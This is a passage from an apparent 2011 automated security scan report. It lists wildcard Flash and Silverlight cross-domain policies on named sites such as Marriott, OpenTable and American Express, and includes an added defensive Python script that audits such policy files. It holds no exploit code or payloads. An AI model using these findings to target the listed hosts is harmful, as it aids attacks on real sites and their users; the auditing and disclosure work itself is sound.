GET /crossdomain.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 198496
Date: Mon, 03 Oct 2011 12:56:16 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...

5.8. http://g-pixel.invitemedia.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 03 Oct 2011 12:52:48 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.9. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Mon, 20-Sep-2021 12:52:46 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.10. http://marriottinternationa.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://marriottinternationa.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: marriottinternationa.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Mon, 03 Oct 2011 12:55:33 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

5.11. http://metrics.marriott.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.marriott.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.marriott.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:55:43 GMT
Server: Omniture DC/2.0.0
xserver: www117
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

5.12. http://o.opentable.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.opentable.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.opentable.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:53:40 GMT
Server: Omniture DC/2.0.0
xserver: www598
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

5.13. http://opentable.tt.omtrdc.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://opentable.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: opentable.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Mon, 03 Oct 2011 12:54:47 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

5.14. http://opentable.ugc.bazaarvoice.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://opentable.ugc.bazaarvoice.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: opentable.ugc.bazaarvoice.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 12:55:22 GMT
Content-Length: 230
Connection: close

<?xml version="1.0" encoding="UTF-8"?><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"/><allow-access-from domain="*"/><allow-http-request-headers-from domain="*" heade
...[SNIP]...

5.15. http://reviews.opentable.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://reviews.opentable.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: reviews.opentable.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Date: Mon, 03 Oct 2011 12:55:11 GMT
Content-Length: 230
Connection: close

<?xml version="1.0" encoding="UTF-8"?><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"/><allow-access-from domain="*"/><allow-http-request-headers-from domain="*" heade
...[SNIP]...

5.16. https://www2.ncl.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www2.ncl.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 29 Sep 2011 05:29:21 GMT
ETag: "a2d0-139-4ae0dca702e40"
X-Ncl-SLog: (null)
Content-Type: text/xml
Cache-Control: max-age=1800
Expires: Mon, 03 Oct 2011 13:33:03 GMT
Date: Mon, 03 Oct 2011 13:03:03 GMT
Content-Length: 313
Connection: close
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:03:03 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:03:03 GMT; path=/; domain=ncl.com

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
...[SNIP]...

5.17. http://www.opentable.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.opentable.com

Response

HTTP/1.1 200 OK
Content-Length: 428
Content-Type: text/xml
Last-Modified: Fri, 23 Sep 2011 02:11:06 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.eyewonder.com" />
<allow-access-from domain="eyewonder.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="eyewonderlabs.com" />
<allow-access-from domain="*.eyewonderlabs.com" />
...[SNIP]...

5.18. https://www201.americanexpress.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www201.americanexpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www201.americanexpress.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 13:02:44 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 31 Oct 2006 05:38:25 GMT
ETag: "3057-122-cb8e3640"
Accept-Ranges: bytes
Content-Length: 290
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.aexp.com" secure="true" />

...[SNIP]...
<allow-access-from domain="*.americanexpress.com" secure="true" />
...[SNIP]...

5.19. http://cache.marriott.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.marriott.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.marriott.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Sat, 19 Mar 2011 22:27:50 GMT
ETag: "c118-354-679ac580"
Accept-Ranges: bytes
Content-Length: 852
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/xml
Cache-Control: max-age=2926
Expires: Mon, 03 Oct 2011 13:44:17 GMT
Date: Mon, 03 Oct 2011 12:55:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cache.mi-perftest1.com"/>
   <allow-access-from domain="www.mi-perftest1.com"/>
...[SNIP]...
<allow-access-from domain="www.marriott.com"/>
...[SNIP]...
<allow-access-from domain="www.marriott.de"/>
   <allow-access-from domain="www.marriott.fr"/>
...[SNIP]...
<allow-access-from domain="www.marriotthotels.co.kr"/>
   <allow-access-from domain="www.latinoamerica.marriott.com"/>
...[SNIP]...

5.20. http://www.marriott.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriott.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marriott.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Sat, 19 Mar 2011 22:27:50 GMT
ETag: "44157-354-679ac580"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/xml
Cache-Control: max-age=2391
Expires: Mon, 03 Oct 2011 13:35:19 GMT
Date: Mon, 03 Oct 2011 12:55:28 GMT
Content-Length: 852
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cache.mi-perftest1.com"/>
   <allow-access-from domain="www.mi-perftest1.com"/>
   <allow-access-from domain="cache.marriott.com"/>
...[SNIP]...
<allow-access-from domain="www.marriott.de"/>
   <allow-access-from domain="www.marriott.fr"/>
...[SNIP]...
<allow-access-from domain="www.marriotthotels.co.kr"/>
   <allow-access-from domain="www.latinoamerica.marriott.com"/>
...[SNIP]...

5.21. https://www.marriott.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marriott.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server/6.1.0.37 Apache/2.0.47 (Unix) DAV/2
Last-Modified: Sat, 19 Mar 2011 22:27:50 GMT
ETag: "c0dc-354-679ac580"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVDo CONo HISa TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV INT DEM PRE"
Content-Type: text/xml
Cache-Control: max-age=1415
Expires: Mon, 03 Oct 2011 13:19:55 GMT
Date: Mon, 03 Oct 2011 12:56:20 GMT
Content-Length: 852
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="cache.mi-perftest1.com"/>
   <allow-access-from domain="www.mi-perftest1.com"/>
   <allow-access-from domain="cache.marriott.com"/>
...[SNIP]...
<allow-access-from domain="www.marriott.de"/>
   <allow-access-from domain="www.marriott.fr"/>
...[SNIP]...
<allow-access-from domain="www.marriotthotels.co.kr"/>
   <allow-access-from domain="www.latinoamerica.marriott.com"/>
...[SNIP]...

5.22. http://www.marriottvacationclub.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marriottvacationclub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marriottvacationclub.com

Response

HTTP/1.0 200 OK
Content-Length: 138
Content-Type: text/xml
Last-Modified: Thu, 10 Mar 2011 15:11:16 GMT
Accept-Ranges: bytes
ETag: "10cce96635dfcb1:4eb1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 13:02:57 GMT
Connection: close
Via: 1.1 mcoatprdslb2 (Juniper Networks Application Acceleration Platform - DX 5.3.2 0)
Set-Cookie: rl-sticky-key=0ace8fd9; path=/; expires=Mon, 03 Oct 2011 13:07:59 GMT

<?xml version="1.0"?>

<cross-domain-policy>

<allow-access-from domain="api.everyscape.com" />

</cross-domain-policy>


6. Silverlight cross-domain policy
There are 8 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains. In clientaccesspolicy.xml that means each domain uri under allow-from, where "*" and "http://*" both admit any origin; the http-request-headers attribute, which with "*" lets those origins send arbitrary headers; and the resource paths under grant-to, which bound what an allowed origin can reach.
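The review described in the Flash (section 5) and Silverlight (section 6) issue backgrounds, as an added example that is not part of the original report: a Python audit that parses either policy format, rates each rule on the scale the report uses (domain="*" High, a "*.example.com" wildcard Low, a specific host Information) and additionally flags the secure attribute, allow-http-request-headers-from, site-control and http-request-headers elements that the report's issue text does not score. The sample policies are transcribed from the responses above with the snipped entries left out; the Silverlight grant-to block is constructed, since the report truncates it, and the Medium rating for site-control is this example's choice, not the report's.

```python
"""Audit Flash (crossdomain.xml) and Silverlight (clientaccesspolicy.xml) policies.
Added example, not part of the original report. Rules are rated on the report's
scale: "*" is High, "*.example.com" is Low, a specific host is Information."""
import xml.etree.ElementTree as ET

RANK = {"Information": 0, "Low": 1, "Medium": 2, "High": 3}


def classify(host):
    """'any' for *, 'wildcard' for *.example.com, otherwise 'specific'."""
    return "any" if host == "*" else "wildcard" if host.startswith("*.") else "specific"


def rate(kind):
    return {"any": "High", "wildcard": "Low", "specific": "Information"}[kind]


def parse(xml_text):
    # Strip a leading BOM (the "..." before <?xml in several responses above).
    return ET.fromstring(xml_text.lstrip("\ufeff \r\n"))


def audit_flash(xml_text, served_over_https=False):
    """Return [(severity, message)] for one crossdomain.xml body."""
    root, findings = parse(xml_text), []
    sc = root.find("site-control")
    if sc is not None and sc.get("permitted-cross-domain-policies") == "all":
        # Rating chosen here; the report does not score site-control. "all" lets
        # any file on the host serve as a policy, a risk wherever users can upload.
        findings.append(("Medium", 'site-control permitted-cross-domain-policies="all"'))
    for rule in root.findall("allow-access-from"):
        dom = rule.get("domain", "")
        findings.append((rate(classify(dom)), f'allow-access-from domain="{dom}"'))
        # On an HTTPS host secure defaults to true; secure="false" lets a plain-HTTP
        # SWF from that domain read HTTPS responses.
        if served_over_https and rule.get("secure", "true").lower() == "false":
            findings.append(("High", f'secure="false" on an HTTPS host for {dom}'))
    for hdr in root.findall("allow-http-request-headers-from"):
        if hdr.get("domain") == "*" and hdr.get("headers") == "*":
            findings.append(("High", "any domain may send arbitrary request headers"))
    return findings


def audit_silverlight(xml_text):
    """Return [(severity, message)] for one clientaccesspolicy.xml body."""
    root, findings = parse(xml_text), []
    for policy in root.iter("policy"):
        paths = [r.get("path", "") for r in policy.iter("resource")]
        for allow in policy.findall("allow-from"):
            if allow.get("http-request-headers") == "*":
                findings.append(("High", 'allow-from http-request-headers="*"'))
            for d in allow.findall("domain"):
                uri = d.get("uri", "")
                host = uri.split("://", 1)[-1]  # "*" and "http://*" both mean any origin
                findings.append((rate(classify(host)), f'domain uri="{uri}" -> {paths}'))
    return findings


def worst(findings):
    """Overall severity of a policy; 'None' when it grants nothing."""
    return max((s for s, _ in findings), key=RANK.get, default="None")


# Constructed inputs: transcribed from the responses above with the snipped entries
# left out; the Silverlight grant-to block is made up, since the report truncates it.
ESTARA = """<?xml version="1.0"?>
<!-- http://as00.estara.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.estara.com" />
<allow-access-from domain="*" />
</cross-domain-policy>"""

NCL = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>"""

AMEX = """<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.aexp.com" secure="true" />
   <allow-access-from domain="*.americanexpress.com" secure="true" />
</cross-domain-policy>"""

OMNITURE = """<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>"""

VIRTUALEARTH = """\ufeff<?xml version="1.0" encoding="utf-8"?>
<access-policy><cross-domain-access><policy>
<allow-from http-request-headers="*"><domain uri="*"/><domain uri="http://*"/></allow-from>
<grant-to><resource path="/" include-subpaths="true"/></grant-to>
</policy></cross-domain-access></access-policy>"""

if __name__ == "__main__":
    for name, body, audit in [("as00.estara.com", ESTARA, audit_flash),
                              ("www2.ncl.com", NCL, audit_flash),
                              ("metrics.marriott.com", OMNITURE, audit_flash),
                              ("dev.virtualearth.net", VIRTUALEARTH, audit_silverlight)]:
        print(f"{name}: {worst(audit(body))} {audit(body)}")
    print("www201.americanexpress.com:", worst(audit_flash(AMEX, served_over_https=True)))
```

Pass served_over_https=True for policies fetched from an https:// host, as for www2.ncl.com and www201.americanexpress.com above, so that a secure="false" rule is caught; for a plain-HTTP host the attribute has no effect. The grant-to paths are reported alongside each Silverlight rule because a policy that opens "/" with include-subpaths is a different finding from one that opens a single public endpoint.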


6.1. http://dev.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Sun, 18 Sep 2011 00:40:53 GMT
Accept-Ranges: bytes
ETag: "63203e9f9b75cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:56:15 GMT
Connection: close
Content-Length: 374

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

6.2. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.dev.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.dev.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Sun, 18 Sep 2011 00:40:53 GMT
Accept-Ranges: bytes
ETag: "63203e9f9b75cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 12:52:58 GMT
Content-Length: 374
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="http://*"/>
...[SNIP]...

6.3. http://ecn.t0.tiles.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1548685
Date: Mon, 03 Oct 2011 12:56:17 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 14:44:51 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.4. http://ecn.t1.tiles.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1545110
Date: Mon, 03 Oct 2011 12:56:16 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 15:44:26 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.5. http://ecn.t2.tiles.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1522849
Date: Mon, 03 Oct 2011 12:56:17 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 21:55:28 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.6. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1545166
Date: Mon, 03 Oct 2011 12:56:16 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 15:43:30 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.7. http://metrics.marriott.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.marriott.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.marriott.com

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:55:43 GMT
Server: Omniture DC/2.0.0
xserver: www120
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

